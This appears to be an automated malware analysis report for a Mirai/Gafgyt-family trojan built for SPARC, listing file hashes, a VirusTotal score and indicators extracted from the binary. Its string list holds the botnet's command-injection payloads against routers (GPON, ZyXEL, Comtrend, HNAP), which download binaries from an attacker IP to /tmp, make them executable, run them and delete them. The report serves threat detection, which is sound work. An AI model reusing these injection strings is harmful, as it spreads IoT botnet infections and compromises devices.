c.spc
First submission 2024-09-05 01:04:02
Last sumbission 2024-09-05 01:18:02
File details
File type: | ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, not stripped |
Mime type: | application/x-executable |
File size: | 173.77 KB (177944 bytes) |
MD5: | 471ca2e78136d6387eb2e8515cb88f2e |
SHA1: | 4ce0444381f7a7f2b1c5958b095690b6285ed8d3 |
SHA256: | 5354dc283ac0fa5135d4a4967536f02048a8a8a1d3eb1c6eb37a869367f04f26 |
File features detected
Is DLL
Packers
Anti Debug
Anti VM
Signed
XOR
OSINT Enrichments
Virus Total: | 42/79 VT report date: 2024-09-05 00:48:21 |
Malware Type 1 | trojan |
Threat Type 3 | mirai gafgyt bashlite |
URLs, FQDN and IP indicators 3
Strings analysis - Possible IPs found 3
5.59.248.92 |
127.0.0.1 |
192.168.0.100 |
Strings analysis - Possible URLs found 13
http://5.59.248.92/Yboats.mips |
http://5.59.248.92/Yboats.mips; |
http://5.59.248.92/gpon443+-O+/tmp/gaf;sh+/tmp/gaf |
http://5.59.248.92/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114 |
http://5.59.248.92/Yboats.mpsl;chmod |
http://5.59.248.92/adb; |
http://5.59.248.92/Yboats.arm7;chmod+777+Yboats.arm7;./Yboats.arm7+zyxel.selfrep;rm+-rf+Yboats.arm7%3b%23&remoteSubmit=Save |
http://schemas.xmlsoap.org/soap/envelope/ |
http://www.w3.org/2001/XMLSchema |
http://www.w3.org/2001/XMLSchema-instance |
http://schemas.xmlsoap.org/soap/encoding/ |
http://5.59.248.92/Yboats.x86 |
http://purenetworks.com/HNAP1/ |